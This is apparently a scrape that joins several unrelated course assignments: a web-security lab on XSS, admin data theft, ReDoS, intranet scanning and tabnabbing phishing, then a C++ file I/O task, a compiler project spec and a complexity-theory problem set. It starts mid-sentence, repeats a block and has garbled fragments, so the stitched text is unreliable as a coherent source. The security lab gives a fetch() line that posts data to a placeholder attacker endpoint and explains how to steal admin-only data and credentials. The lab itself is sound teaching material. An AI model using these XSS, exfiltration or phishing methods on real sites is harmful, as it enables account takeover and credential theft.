your script. Other tips: Do not use window.open for opening a new window (when the victim clicks a link). All submissions will go to GradeScope where an autograder will help you understand the correctness of your solution.The autograder will deduct points for files that are not uploaded. You can upload an empty file if you haven’t gone that far yet, or just ignore the points deducted. Make sure you upload all the files when you are done. Please do not expect TAs to debug your code or provide a walkthrough for the tasks, as you are expected to master the low-level details when you complete this course. Due to our limited bandwidth, we also do not entertain questions answered in our FAQ unless you explain why the FAQ cannot resolve your issues. If you suspect there are issues with our web server or the autograder, please provide details so that we can resolve the issues more efficiently. You can clean your endpoint/inbox by posting tons of messages to your inbox or redoing your Q1.5 in Task 1. Please make sure that you have correctly set your username in the questionnaire. We strongly advise that you DO NOT rely on any AI chat bots or similar AI platforms to generate a solution. Not only does the AI bot forfeit your chance to learn something, but such solutions do not correctly cite sources and are often too like those of other students who also utilize AI bots. Regardless of your intention, we treat them all as plagiarism if we detect very similar solutions. We have kept improving this project for many years. And so many students successfully finished this project. Most unhappy cases are due to typo mistakes, syntax errors in the submitted solution, or misunderstanding of the attack concept. Unlike typical computer system courses, the environment for this project will be out of your control, and you will drive off-road. So, you cannot assume the victim’s environment is the same as yours. If something does not work as expected, we advise you to inspect your code line-by-line (e.g., putting a log message line-by-line) and review the given materials (e.g., tips, videos, other students’ posts, etc.). We don’t debug your code. Learning the attacker’s mind is one of the goals of the project. Although you don’t have server access for debugging, you can inject a script into the project server. Using log messages in the injected script, you can figure out the server’s status (e.g., where it gets stuck) by transferring the log messages from the server to your endpoint.
Programming Assignment 6 Advanced File I/O 70 PointsPlant FileWrite a program that the Plant Shack (Prog 5) can use to create and maintain a file with information for their spring plants. Name the data file plants.dat Employees will use this program to store the plant information. Program 5 can then be updated to read from a file instead of using an initialized array, but you do not need to update program 5, just write this program.Use a structure with the following fields to hold the information for each structure.Field Name Description name string type Kind cost float/double qty_avail intUse an enumerated type for Kind that contains the following enumerators: FLOWER, VEGETABLE, GRASS, SHRUBThis program will NOT use an array of structures. Instead, your program will use the plants.dat file to store the plant records and a single structure variable to read/write a record as needed.In main, use the code discussed in the notes to create a new file, only if one does not already exist. If one already exists, it should be used. Open the file for binary input and output. You can open it once in main and pass it into your functions, or you can have each function that needs the file open it in the mode that it needs and close it when finished.Your program must include a menu with the operations shown below:1. Add a record. (Read the info for one plant from the user into a single struct variable, and use the write command to add it to the end of the data file.) 2. Print All (print the info for all activities in a table with column headings. Display the Kind as a word.) 3. Edit All Quantities. (move through all of the records in the file, printing the current information and asking the user if they want to change the quantity, if so read the new quantity, updated the data in the structure variable, then back up and write the updated record out over the old record. Do not try to read or write only the quantity field, just read and write the entire record. Hint: Use seekp to move back one record. 4. Exit the program.Your program should allow the user to make selections until they choose “Exit” which will end the program.Use a second enumerated type for the operations {ADD, PRINT, EDIT, EXIT}. Use the enumerators in a switch/case statement that calls a function to process each choice.Your program should be modular. Use a separate function for each option stated above. Your output should be well-organized, neat, and easy to read.Design your program by completing the CSC 250 Program Design Document. Be sure to include a structure chart for the program, the prototype for each function, a brief description of what each function does and time estimates for program design, coding each function, program testing, and total time.Write your program and save it in a file named plant_file_xxx.cpp where xxx are your initials. Compile, run and test your program.
I will start with a high-level description of the project and its tasks, and in subsequent sections I will give a detailed description on how to achieve these tasks. The goal of this project is to implement a simple compiler for a simple programming language. To implement this simple compiler, you will write a recursive-descent parser and use some simple data structures to implement semantic checking and execute the input program. The input to your compiler has four parts:Your compiler will parse the input and produces a syntax error message if there is a syntax error. If there is no syntax error, your compiler will analyze semantic errors. If there are no syntax and no semantic errors, your compiler will perform other semantic analyses if so specified by the tasks numbers in the TASKS section. If required, it will also execute the EXECUTE section and produces the output that should be produced by the OUTPUT statements.The remainder of this document is organized as follows.Note: Nothing in this project is inherently hard, but it is larger than other projects that you have done in the past for other classes. The size of the project can make it feel unwieldy. To deal with the size of the project, it is important to have a good idea of what the requirements are. To do so, you should read this document a couple of times. Then, you should have an implementation plan. I make the task easier by providing an implementation guide that addresses some issues that you might encounter in implementing a solution. Once you have a good understanding and a good plan, you can start coding.The input of your program is specified by the following context-free grammar:The code that we provided has a class LexicalAnalyzer with methods GetToken() and peek(). Also, an expect() function is provided. Your parser will use the functions provided to peek()) at tokens or expect() tokens as needed. You must not change these provided functions; you just use them as provided. In fact, when you submit the code, you should not submit the files inputbuf.cc, (inputbuf.h, lexer.cc or lexer.h on gradescope; when you submit the code, the submission site will automatically provide these files, so it is important not to modify these files in your implementation.To use the provided methods, you should first instantiate a lexer object of the class LexicalAnalyzer and call the methods on this instance. You should only instantiate one lexer object. If you try to instantiate more than one, this will result in errors.The definition of the tokens is given below for completeness (you can ignore it for the most part if you want).What you need to do is write a parser to parse the input according to the grammar and produce a syntax error message if there is a syntax error. Your program will also check for semantic errors and, depending on the tasks list, will execute more semantic tasks. To achieve that, your parser will store the program in appropriate data structures that facilitate semantic analysis and allow your compiler to execute the statement list in the execute_section. For now, do not worry how that is achieved. I will explain that in detail, partly in this document and more fully in the implementation guide document.The following are examples of input (to your compiler) with corresponding outputs. The output will be explained in more detail in later sections. Each of these examples has task numbers 1 and 2 listed in the tasks_section. They have the following meanings:TASKS1 2POLYEXECUTEX = F(4); Y = G(2); OUTPUT X;OUTPUT Y;INPUTS1 2 3 18 19This example shows two polynomial declarations and a EXECUTE section in which the polynomials are evaluated with arguments 4 and 2 respectively. The output of the program will be17 3The sequence of numbers at the end (in the input_section) is ignored because there are no INPUT statements.TASKS1 2POLYEXECUTEINPUT X; INPUT Y;X = F(X); Y = G(Y);OUTPUT X;INPUTS1 2 3 18 19This is similar to the previous example, but here we have two INPUT statements. The first INPUT statement reads a value for X from the sequence of numbers and X gets the value 1. The second INPUT statement reads a value for Y which gets the value 2. Here the output will be 2Note that the values 3, 18 and 19 are not read and do not affect the execution of the program.1: TASKS2: 1 23: POLY4: F = x^2 + 1;5: G = x + 1;6: EXECUTE7: INPUT X; 8: INPUT Y;9: X = F(X); 10: Y = G(Y); 11: OUTPUT X;12: INPUTS13: 1 2 3 18 19Note that there are line numbers added to this example. These line numbers are not part of the input and are added only to refer to specific lines of the program. In this example, which looks almost the same as the previous example, there is a syntax error because there is a missing semicolon on line 4. The output of the program should be SYNTAX ERROR !!!!!&%!!1: TASKS2: 1 23: POLY4: F = x^2 + 1;5: G(X,Y) = X Y^2 + X Y;6: EXECUTE7: INPUT Z; 8: INPUT W;9: X = F(Z);10: Y = G(Z,W);11: OUTPUT X;12: OUTPUT Y;12: INPUTS13: 1 2 3 18 19In this example, the polynomial G has two variables which are given explicitly (in the absence of explicitly named variables, the variable is lower case x by default). The output is2 61: TASKS2: 1 23: POLY4: F = x^2 + 1;5: G(X,Y) = X Y^2 + X Z;6: EXECUTE7: INPUT Z; 8: INPUT W;9: X = F(Z);10: Y = G(Z,W);11: OUTPUT X;12: OUTPUT Y;12: INPUTS13: 1 2 3 18 19This example is similar to the previous one but it has a problem. The polynomial G is declared with two variables X and Y but its equation (called poly_body in the grammar) has Z which is different fromX and Y. The output captures this error (see below for error codes and their format) Semantic Error Code 2: 5The task numbers specify what your program should do with the input program. Task 1 is one of the larger tasks and, but it is not graded as one big task. Task 1 has the following functionalities:The other tasks, 2, 3, 4, 5 and 6 have the following functionalities:Detailed descriptions of these tasks and what the output should be for each of them is given in the sections that follow. The remainder of this section explains what the output of your program should be when multiple task numbers are listed in the tasks_section.If task 1 is listed in the tasks_section, then task 1 should be executed. Remember that task 1 performs syntax error checking and semantic error checking. If the execution of task 1 results in an error, and task 1 is listed in the tasks_section, then your program should only output the error messages (as described below) and exits. If task 1 results in an error (syntax or semantic) no other tasks will be executed even if they are listed in the tasks_section. If task 1 is listed in the tasks_section and does not result in an error message, then task 1 produces no output. In that case, the outputs of the other tasks that are listed in tasks_section should be produced by the program. The order of these outputs should be according to the task numbers. So, first the output of task 2 is produced (if task 2 is listed in tasks_section), then the output of task 3 is produced (if task 3 is listed in tasks_section) and so on.If task 1 is not listed in the tasks_section, task 1 still needs to be executed. If task 1’s execution results in an error, then your program should output nothing in this case. If task 1 is not listed and task 1’s execution does not result in an error, then the outputs of the other tasks that are listed in tasks_section should be produced by the program. The order of these outputs should be according to the task numbers. So, first the output of task 2 is produced, then the output of task 3 is produced (if task 3 is listed in tasks_section) and so on.You should keep in mind that tasks are not necessarily listed in order in the tasks_section and they can even be repeated. For instance, we can have the following TASKS section: TASKS1 3 4 1 2 3In this example, some tasks are listed more than once. Later occurrences are ignored. So, the tasks_section above is equivalent to TASKS 1 2 3 4In the implementation guide, I explain a simple way to read the list and sort the task numbers using a boolean array.For task 1, your solution should detect syntax and semantic errors in the input program as specified in this section.If the input is not correct syntactically, your program should output SYNTAX ERROR !!!!!&%!!If there is syntax error, the output of your program should exactly match the output given above. No other output should be produced in this case, and your program should exit after producing the syntax error message. The provided parser.* skeleton files already have a function that produces the message above and exits the program.Semantic checking also checks for invalid input. Unlike syntax checking, semantic checking requires knowledge of the specific lexemes and does not simply look at the input as a sequence of tokens (token types). I start by explaining the rules for semantic checking. I also provide some examples to illustrate these rules.than once. The output in this case should be of the formSemantic Error Code 1: … where through are the numbers of each of the lines in which a duplicate polynomial_name appears in a polynomial header. The numbers should be sorted from smallest to largest. For example, if the input is (recall that line numbers are not part of the input and are just for reference):1: TASKS2: 1 3 43: POLY4: F1 =5: x^2 + 1;6: F2 = x^2 + 1; 7: F1 = x^2 + 1;8: F3 = x^2 + 1;9: G = x^2 + 1;10: F1 = x^2 + 1;11: G(X,Y) = X Y^2 + X Y;12: EXECUTE13: INPUT Z; 14: INPUT W;15: X = F1(Z);16: Y = G(W); 17: OUTPUT X;18: OUTPUT Y;19: INPUTS20: 1 2 3 18 19then the output should beSemantic Error Code 1: 7 10 11because on each of these lines the name of the polynomial in question has a duplicate declaration. Note that only the line numbers for the duplicates are listed. The line number for the first occurrence of a name is not listed.Semantic Error Code 2: … where through are the numbers of lines in which an invalid monomial name appears with one number printed per occurrence of an invalid monomial name. If there are multiple occurrences of an invalid monomial name on a line, the line number should be printed multiple times. The line numbers should be sorted from smallest to largest.Semantic Error Code 3: … where through are the numbers of each of the lines in which apolynomial_name appears in a polynomial_evaluation but for which there is no polynomial_declarationwith the same name. The line numbers should be listed from the smallest to the largest. For example ifthe input is:1: TASKS2: 1 3 43: POLY4: F1 = x^2 + 1; 5: F2 = x^2 + 1; 6: F3 = x^2 + 1; 7: F4 = x^2 + 1; 8: G1 = x^2 + 1; 9: F5 = x^2 + 1;10: G2(X,Y) = X Y^2 + X Y;11: EXECUTE12: INPUT Z; 13: INPUT W;14: X = G(Z);15: Y = G2(Z,W);16: X = F(Z);17: Y = G2(Z,W);18: INPUTS19: 1 2 3 18 19then the output should beSemantic Error Code 3: 14 16Because on line 14, there is an evaluation of polynomial G but there is no declaration for polynomial G and on line 16, there is an evaluation of polynomial F but there is no declaration of polynomial F.where through are the numbers of each of the lines in which polynomial_name appears in a polynomial_evaluation but the number of arguments in the polynomial evaluation is different from the number of parameters in the corresponding polynomial declaration. The line numbers should be listed from the smallest to the largest. For example if the input is:1: TASKS2: 1 3 43: POLY4: F1 = x^2 + 1;5: F2 = x^2 + 1; 6: F3 = x^2 + 1; 7: F4 = x^2 + 1; 8: G1 = x^2 + 1; 9: F5 = x^2 + 1;10: G2(X,Y) = X Y^2 + X Y;11: EXECUTE12: INPUT Z; 13: INPUT W;14: X = G2(X,Y, Z);15: Y = G2(Z,W);16: X = F1(Z);17: Y = F5(Z,Z);18: Y = F5(Z,Z,W);19: INPUTS20: 1 2 3 18 19then the output should beSemantic Error Code 4: 14 17 18You can assume that an input program will have only one kind of semantic errors. So, for example, if a test case has Semantic Error Code 2, it will not have any other kind of semantic errors.For task 2, your program should output the results of all the polynomial evaluations in the propram. In this section I give a precise definition of the meaning of the input and the output that your compiler should generate. In a separate document that I will upload a little later, I will give an implementation guide that will help you plan your solution. You do not need to wait for the implementation guide to write the parser!The program uses names to refer to variables in the EXECUTE section. For each variable name, we associate a unique locations that will hold the value of the variable. This association between a variable name and its location is assumed to be implemented with a function location that takes a string as input and returns an integer value. We assume that there is a variable mem which is an array with each entry corresponding to one variable. All variables should be initialized to 0 (zero).To allocate mem entries to variables, you can have a simple table or map (which I will call the location table) that associates a variable name with a location. As your parser parses the input program, if it encounters a variable name in an input_statement, it needs to determine if this name has been previously encountered or not by looking it up in the location table. If the name is a new variable name, a new location needs to be associated with it, and the mapping from the variable name to the location needs to be added to the location table. To associate a location with a variable, you can simply keep a counter that tells you how many locations have been used (associated with variable names). Initially, the counter is 0. The first variable will have location 0 associated with it (will be stored in mem[0]), and the counter is incremented to become 1. The next variable will have location 1 associated with it (will be stored in mem[1]), and the counter is incremented to become 2 and so on.For example, if the input program is1: TASKS2: 1 23: POLY4: F1 = x^2 + 1;5: F2(x,y,z) = x^2 + y + z + 1;6: F3(y) = y^2 + 1;7: F4(x,y) = x^2 + y^2;8: G1 = x^2 + 1; 9: F5 = x^2 + 1;10: G2(X,Y,Z,W) = X Y^2 + X Z + W + 1;11: EXECUTE12: INPUT X; 13: INPUT Z;14: Y = F1(Z);15: W = F2(X,Z,Z);16: OUTPUT W;17: OUTPUT Y;18: INPUT X; 19: INPUT Y; 20: INPUT Z;21: Y = F3(X);22: W = F4(X,Y);23: OUTPUT W;24: OUTPUT Y;25: INPUT X; 26: INPUT Z; 27: INPUT W;28: W = G2(X,Z,W,29: Z);30: INPUTS31: 1 2 3 18 19 22 33 12 11 16Then the locations of variables will beX 0 Z 1 Y 2 W 3We explain the semantics of the four kinds of statements in the program.Input statements get their input from the sequence of inputs. We refer to i’th value that appears in inputs as i’th input. The i’th input statement in the program of the form INPUT X is equivalent to:mem[location(“X”)] = i’th inputOutput statements have the form OUTPUT ID where the lexeme of the token ID is a variable name. This is the output variable of the output statement. Output statements print the values of their OUTPUT variables. If the output statement has the form OUTPUT X; , its effect is equivalent to:cout output_file.txt will read standard input from input_data.txt and produces standard output to output_file.txt.Now that we know how to use standard IO redirection, we are ready to test the program with test cases.For a given input to your program, there is an expected output which is the correct output that should be produced for the given input. So, a test case is represented by two files:The input is given in test_name.txt and the expected output is given in test_name.txt.expected.To test a program against a single test case, first we execute the program with the test input data:$ ./a.out < test_name.txt > program_output.txtWith this command, the output generated by the program will be stored in program_output.txt. To see if the program generated the correct expected output, we need to compare program_output.txt and test_name.txt.expected. We do that using the diff command which is a command to determine differences between two files:$ diff -Bw program_output.txt test_name.txt.expectedIf the two files are the same, there should be no difference between them. The options -Bw tell diff to ignore whitespace differences between the two files. If the files are the same (ignoring the whitespace differences), we should see no output from diff, otherwise, diff will produce a report showing the differences between the two files.We consider that the test passed if diff could not find any differences, otherwise we consider that the test failed.Our grading system uses this method to test your submissions against multiple test cases. In order to avoid having to type the commands shown above for running and comparing outputs for each test case manually, we provide you with a script that automates this process. The script name is test1.sh. test1.sh will make your life easier by allowing you to test your code against multiple test cases with one command.Here is how to use test1.sh to test your program:This will create a directory called testsThe output of the script should be self explanatory. To test your code after you make changes, you will just perform the last two steps (compile and run test1.sh).[1] Programs have access to another standard stream which is called standard error e.g. std::cerr in C++. Any such output is still displayed on the terminal screen. It is possible to redirect standard error to a file as well, but we will not discuss that here
You can find the due date and how to turn in your solution located on the Canvas assignment page and Ed discussion. You’ve been invited to the CS6262 security club; welcome! The security club has a new official website we use for sharing information and resources. Unfortunately, the last administrator was too busy and didn’t perform any security audits on the website. Oh no!The club’s security team wants you, the club’s newest member, to deliver a full security audit of our new official website. You’ve been tasked to provide a pen-testing report to the club’s security team. You’ve received this message to start you off:“Hi there! The club’s website can be found at https://cs6262.gtisc.gatech.edu. We’ve integrated the GT Single-Sign-On service, so please sign in with your GT account and it will create a user for you. The website is not complicated. It is a simple Content Management System (CMS) with several features enabled, e.g., text search, dark mode, rich text editor, etc. Good luck auditing! The CS6262 Security Team” Let’s first orient ourselves on the website. The project website is located at cs6262.gtisc.gatech.edu – type this into your browser. We recommend using the latest version of Google Chrome. To trigger an XSS attack on the admin side, fill in the URL of your post and submit to the admin role. It will create or override the current running browser instance, which means when it’s messed up, you can submit a URL to override the current one. To trigger an XSS attack on other users’ sides, fill in the URL of your malicious payload. The user instances also override the current one when you submit new URLs. The admin instance will be used for task 4 and task 5.2. The user instance will be used for task 5.3. iii. Check “Restart the ReDoS instance” to launch the ReDoS server again when you feel like the server is not responding to your submission. Here are the two approaches. Note: Fill up the questionnaire and submit required files onto GradeScope. Modern browsers will provide DevTools for front-end developers to debug and tune the performance when developing a website. Attackers can also use these tools to explore and collect information. Open your Chrome and press F12 to open the developer console. DevTools will popup. Here you can run JavaScript in the console, view the source html of the webpage, capture the network traffic, and other functionalities. Try to explore it by yourself. 1.2 console.log() console.log() is commonly used to print information into the console of the developer tools for debugging purposes. Open the devTool and type console.log(“yourGTID”); You can see your GTID is printed in the console. 1.3 setInterval setInterval is used to fire a function given a frequency. It will return an intervalID which can be passed to clearInterval to cancel the interval. Question: Given a variable var counter = 5, make use of setInterval and clearInterval to reduce thecounter to 0 in every second and then stop. You can run your code in devTools to verify. var counter = 5;// Your code below 1.4 setTimeout setTimeout will fire a function after the delay milliseconds. The function will only be fired once. Similarly you can use the returned timeoutID and clearTimeout to cancel the timeout. Question: Given a variable var counter = 5, make use of setTimeout to reduce the counter to 0 in every second and then stop. You can run your code in devTools to verify.var counter = 5;// Your code below 1.5 Promise A Promise is an object used for async operations in JavaScript. There are three states in a Promise object: Pending, Fulfilled, and Rejected. Once created, the state of the Promise object is pending. So the calling function will not be blocked and continue executing. The Promise object will eventually be fulfilled or rejected. Then the respective resolve or reject function will be called. Below is an example of a Promise. Before running the code, can you tell what the output would be? Can you explain why? Which of the following options can adjust iframe’s width and height correctly? FAQ Please make sure that you have correctly set your username in the questionnaire. Find where to exploit a reflected XSS and fill in the questionnaire URL by visiting which an alert should trigger. Reflective XSS is an attack where a website does not return requested data in a safe manner.Reflective is generally an XSS attack where the attacker sends the victim a link to a reputable website. BUT, this link contains malicious javascript code. For example, https://www.facebook.com/login?username=username&password=passwordsteal-yourinformation.jsIf the website returns the data in an unsafe manner (does not sanitize the output) and the victim clicks on this link, then the malicious code will be executed in the context of the victim’s session. The content of the alert doesn’t matter. For example, https://cs6262.gtisc.gatech.edu/endpoint…yourpayload is what you need to fill in the questionnaire. The autograder will visit your URL. If it detects an alert, then you will receive full credit. After finding the exploitable place from task 2, you understand you can infect others by sending them links. But sending links is costly and people may not click on them every time. Therefore, instead of sending a link required in task 2, you find you can actually modify the payload and let the payload live in this web app forever. As long as a user clicks on the link you send once, she is infected persistently unless the payload is cleared. After learning some types of XSS, you may think how I can make my attack as persistent as possible on the client’s side if the website doesn’t have a Stored-XSS vulnerability exposed to regular users. As Web technology evolves, more and more applications start to focus on user experience. More and more web applications, including cross platform Electron applications, are taking over desktop applications. Some user’s non-sensitive data is now stored on the client-side, especially the look and feel preferences of an application, to let the App load faster by remembering the user’s preferences without passing back small data chunks. (You can learn more how prevalent this unsafe design is nowadays by reading the paper Don’t Trust The Locals: Investigating the Prevalence of Persistent Client-Side Cross-Site Scripting in the Wild) Then, the variable is read by an unsafe sink, e.g. eval, element.innerHTML(data). Inspect what is stored locally for the web application, cs6262.gtisc.gatech.edu, and how it is used. Tools you may need: Now, modify the payload in the link from task 2 and fill the updated URL in the questionnaire. The autograder will first visit your URL (NO alert should pop up at this point). Then, it would close the page and reopen to trigger your payload to run (One alert should pop up). Next, it refreshes the page without retriggering your payload (Another alert should pop up). Again, it should detect the alert twice. It should not pop up an alert by only visiting your URL. (Namely, the alert should be triggered when the victim visits any page on this website after reopening.) Deliverables The website, https://cs6262.gtisc.gatech.edu, allows users to create articles. As a user, one needs to submit the post to a moderator who is the admin of the website for approval. This might be an interesting point to investigate whether you can inject something so when the admin is reviewing your post, thereby you can hijack the admin’s login session. This website uses a rich text editor which not only enables styled content but sanitizes the user’s input while preserving its style. In this task, you will submit a post with an injected payload that launches XSS attached to an admin user. Then, you need to steal some information that is only visible to an admin. Stored XSS is an attack where a website does not store data in a safe manner. An attacker could then store malicious code within the website’s database. Said code could be executed whenever a user visits that website. So, a post for an admin’s approval seems like something you will be interested in. If you can steal the admin’s login session cookie, you can login as her to see what she can see. Recall from the lecture that when a cookie has httpOnly, it is not exposed to the document object. This cookie cannot be accessed by JavaScript. What would you need to do to read information out as the cookie’s owner? This httpOnly flag is a good way to prevent JavaScript from reading sensitive cookies. However, it doesn’t mean it can mitigate XSS attacks. Attackers, having malicious scripts running in the victim’s browser, are still able to send requests and forward the responses to themselves. Even though the website is protected by CSRF tokens, attackers can still manage to post malicious payload pretending to be the user. “fetch(‘https://your_endpoint_address/’, {method: ‘post’, body: ‘hi’})” will help you verify the correctness. Then, you should be able to see this after opening your endpoint in a new tab. In this way, you should be able to read data out of the website and send it to your HTTP endpoint. If you are not familiar with the basics of HTTP and JavaScript, learning how to use fetch in an async chain can be helpful. You may read the examples in this documentation:https://developer.mozilla.org/en-US/docs/Web/API/fetch Also, before posting your write-up, please switch back to the “normal” mode to ensure it works. Logging in as an admin is difficult since the website is well-configured to prevent it from happening, even if you have the cookie. An easier way is to “see” the admin’s console page (via your exploit script) and locate the “Information Theft” input box. Looking into the HTML of the page, you will know how you can instruct the admin (again, using your exploit script) to help you to get the hash. The autograder checks your script. Please make sure you have submitted it correctly. Also, please make sure your submission strictly follows the format guideline. A possible reason is that some residual malicious code/scripts are still left on the website, e.g., your local storage or endpoint/inbox. Please clean all the cache and local storage of the website and clean your endpoint/inbox. You can clean your endpoint/inbox by posting tons of messages to your inbox or redoing your Q1.5 in Task 1. You just have learned how to exploit XSS in various ways. In this task, you will learn what XSS is capable of. You’ve learned from the DoS lecture that GitHub was attacked in March 2015. Those flooding requests came from browsers! Application layer DoS attacks are difficult to stop because a request sent by a bot is the same as a request from a legitimate user. Common mitigation against request flooding is applying challenges like reCaptcha. What if we can still exhaust the server’s resources without flooding requests? A throttle to frequent requests won’t be able to stop it! Regular Expression Denial of Service (ReDoS) is one type of application layer, DoS. Due to the nature of single-threaded JavaScript and its event-loop architecture, if an event takes a long time to execute, the JavaScript thread will not be able to process other normal events. Imagine what if it takes 5 seconds to check a single regular expression. It impacts other users’ experiences severely since the web server is so busy processing the single regular expressions which result in a denial of service to other users. Here are some references: https://www.cloudflare.com/learning/ddos/application-layer-ddos-attack/ https://en.wikipedia.org/wiki/ReDoShttps://sec.okta.com/articles/2020/04/attacking-evil-regex-understanding-regular-expression-denialserviceFreezing the Web: A Study of ReDoS Vulnerabilities in JavaScript-based Web Servers Read the references above to understand what ReDoS is and its impact. In this task, you will try one kind of ReDoS attack. You will find the ReDoS section on the console page. Try to compose a username and password combination to launch a ReDoS attack against the ReDoS server. When an attack is successful, a hash value will be available for you to submit. The username can be a regular expression.Read the materials above, and you will find the solution. Network work scanning has been well studied. You have practiced Nmap in Project 1. In order to scan the intranet using Nmap, you need access to a host in the intranet, which is quite difficult in general. However, by leveraging a user’s browser running on a host inside the intranet, you are still able to scan the intranet by injecting malicious scripts. There are some interesting materials related to intranet scanning using a browser. These vulnerabilities were mitigated since they were disclosed. However, given the common incorrect “Access-Control-Allow-Origin” setup in an intranet network, you may be lucky to sniff something from your target’s local network. As we learned from the lectures, a DNS rebinding attack allows an attacker to bypass SOP, thereby the attacker can read content from intranet web servers. But before launching a DNS rebinding attack, one must know what web servers are available in that organization. A local webserver scanning can help the attacker determine the targets. Now, assume you, as the attacker, have already learned the local IP address range below. And your goal is to determine what IP addresses are serving web content. (Recall the port number or protocol name for serving web content.) A web server will respond “hello” in plain text. The local host IP range is from 172.16.238.4 to 172.16.238.255, which is what you need to scan. These hosts are not accessible from outside as it’s only accessible to the victims – a user or an admin. Deliverables You will get 15% for all correct IP addresses and 0% for all incorrect. Here are some references to cross-origin vulnerabilities: https://portswigger.net/web-security/cors/access-control-allow-originhttps://www.pivotpointsecurity.com/blog/cross-origin-resource-sharing-security/ These two articles below are related to using WebRTC to scan from a browser because of the mechanism of establishing a peer to peer connection if you are interested. These are past-tense anyways, but you are welcome to think of any new ideas related to this. A Browser Scanner: Collecting Intranet Information https://medium.com/tenable-techblog/using-webrtc-ice-servers-for-port-scanning-in-chromece17b19dd474 Reviewing your answer to Q2.3 in Task 1 may help. Please make sure that it’s the admin who runs your script. This IP is only accessible by the admin. Also, please specify the correct protocol name or port number. (The server serves web content, as mentioned in our write-up.) In this task, you are determined to steal other users’ credentials. As per an online survey, you learn people open 10~20 tabs on average to surf the Internet. Therefore, you think tabnabbing, one of the phishing attacks that lure users into giving up their credentials, could be a good social engineering attack vector. Here are some references about what tabnabbing is. https://owasp.org/www-community/attacks/Reverse_Tabnabbinghttps://en.wikipedia.org/wiki/Tabnabbinghttps://medium.com/@shatabda/security-tabnabbing-what-how-b038a70d300e Given restrictions https://cs6262.gtisc.gatech.edu has and you being able to exploit the XSS vulnerabilities only, you have to implement a variant of tabnabbing following the requirements below. After the simulated user submits her credentials, you will receive a hash string in your Message Receiver Endpoint.If they are changed, the user may not find the tab and see your phishing page.And, the URL in the address bar should NOT change for the opener tab. Vigilant users may also look at the address bar to determine whether the URL is correct. So, it’s better to keep the original URL to get the user’s trust. If your attack changes the webpage after the victim switches back to the attacked tab, the user bot may not be able to fill in the form. Please make sure that the webpage content is changed right after 60 seconds (the victim switched to another tab) and before the victim switches back. When a tab does not have focus, setInterval running inside has a lower resolution. This issue may worsen on user bots when our server runs under pressure. Please be aware of it when you write your script. If the login user to your tabnab page is not the user bot, it will send a wrong hash to your endpoint. Please ensure that it was the user bot who logged in to the tabnab page but not any other users, e.g., you being the victim of your script. Other tips: Do not use window.open for opening a new window (when the victim clicks a link). All submissions will go to GradeScope where an autograder will help you understand the correctness of your solution.The autograder will deduct points for files that are not uploaded. You can upload an empty file if you haven’t gone that far yet, or just ignore the points deducted. Make sure you upload all the files when you are done. Please do not expect TAs to debug your code or provide a walkthrough for the tasks, as you are expected to master the low-level details when you complete this course. Due to our limited bandwidth, we also do not entertain questions answered in our FAQ unless you explain why the FAQ cannot resolve your issues. If you suspect there are issues with our web server or the autograder, please provide details so that we can resolve the issues more efficiently. You can clean your endpoint/inbox by posting tons of messages to your inbox or redoing your Q1.5 in Task 1. Please make sure that you have correctly set your username in the questionnaire. We strongly advise that you DO NOT rely on any AI chat bots or similar AI platforms to generate a solution. Not only does the AI bot forfeit your chance to learn something, but such solutions do not correctly cite sources and are often too like those of other students who also utilize AI bots. Regardless of your intention, we treat them all as plagiarism if we detect very similar solutions. We have kept improving this project for many years. And so many students successfully finished this project. Most unhappy cases are due to typo mistakes, syntax errors in the submitted solution, or misunderstanding of the attack concept. Unlike typical computer system courses, the environment for this project will be out of your control, and you will drive off-road. So, you cannot assume the victim’s environment is the same as yours. If something does not work as expected, we advise you to inspect your code line-by-line (e.g., putting a log message line-by-line) and review the given materials (e.g., tips, videos, other students’ posts, etc.). We don’t debug your code. Learning the attacker’s mind is one of the goals of the project. Although you don’t have server access for debugging, you can inject a script into the project server. Using log messages in the injected script, you can figure out the server’s status (e.g., where it gets stuck) by transferring the log messages from the server to your endpoint.
Problem 1 (20 points) Let G be undirected and connected graph. A graph is said to be connected if every pair of vertices in the graph are connected by a path. A path is called an Eulerian path if it starts and ends at a same vertex and all edges in G appear on the path exactly once. The Eulerian path problem is defined as follows. EULERIAN−PATH = { hGi | G has an Eulerian path } Prove that EULERIAN−PATH is in P. Hint: Prove that G has an Eulerian path if and only if every vertex in G has even number of degree, i.e., every vertex is in touch with an even number of edges. One direction is easy. Use induction to prove the other.Problem 2 (20 points) Let G be undirected graph whose every edge is associated with an integer (length). The Traveling Salesman Problem is defined as follows. TSP = { hG, ki | G has a Hamiltonian path of length less than k } Prove that TSP is NP-complete. Hint: Prove that HAMILTON−PATH ≤P TSP.Problem 3 (20 points) A disqualifier for a language L is DTM D, where L = { w | D accepts hw, ei for some word e }. D is polynomial time disqualifier if D runs in polynomial time in the length of w. A language L is polynomially disqualifiable if it has a polynomial time disqualifier. Prove that a language is in coNP iff it has a polynomial time disqualifier.Problem 4 (20 points) A language L is coNP-complete if L ∈ coNP, and for any language L 0 ∈ coNP, L 0 ≤P L . Prove the following statements. (10 points) The class coNP is closed under polynomial-time reductions; that is, if L1 ≤P L2 and L2 ∈ coNP, then L1 ∈ coNP. (10 points) If a coNP-complete language L is in NP, then coNP = NP.Problem 5 (20 points) Let P L be the class of languages recognized by polynomial time oracle Turing machines with an oracle for the language L . Let C be a class of languages. Define P C = S L ∈C P L ; that is, P C is the class of languages recognized by polynomial time oracle Turing machines that use oracles for languages in C. Prove the following statements. (5 points) For any language class C, P C is closed under complementation; that is, L ∈ P C iff L ∈ P C . (5 points) For any language class C that is closed under complementation, C ⊆ coNP iff C ⊆ NP. (5 points) P P ⊆ P. (5 points) NPP ⊆ NP.
